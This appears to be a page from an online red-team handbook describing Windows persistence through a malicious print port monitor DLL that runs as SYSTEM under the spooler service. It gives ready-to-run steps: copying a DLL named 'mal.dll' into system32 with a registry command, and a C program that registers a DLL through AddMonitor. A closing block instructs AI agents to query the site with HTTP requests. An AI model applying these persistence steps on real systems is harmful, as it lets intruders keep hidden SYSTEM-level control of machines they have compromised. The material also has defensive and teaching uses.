# Port Monitor

Windows provides printing functionality to the user and allows the user to add port monitors for more extendibility. Port monitor is a DLL which connects the spooling service and a printer, and allows to send raw device commands to the printer. We can abuse this for persistence by adding our own arbitrary dll that acts as a "monitor" .

This will be executed as SYSTEM, and will be spawned under spoolsv.exe.

We can do this in 2 ways, via registry or via the AddMonitor function. To do this via registry:&#x20;

```
copy c:\mal.dll c:\windows\system32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\PortMonitor" /v Driver /t REG_SZ /d "mal.dll" /f
```

To do this with the AddMonitor function, here is a code snippet from ired.team that does achieves this:&#x20;

```
#include "Windows.h"
 
int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12] = TEXT("Windows x64");
    TCHAR name[12] = TEXT("Monitor");
    TCHAR dll[12] = TEXT("test.dll");
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
    return 0;
}
```

Test.dll is the dll that would be persisted, note that you have to copy this over to the system32 folder before you run the above code.&#x20;

## Resources

{% embed url="<https://www.ired.team/offensive-security/persistence/t1013-addmonitor>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/persistence/admin-level/port-monitor.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.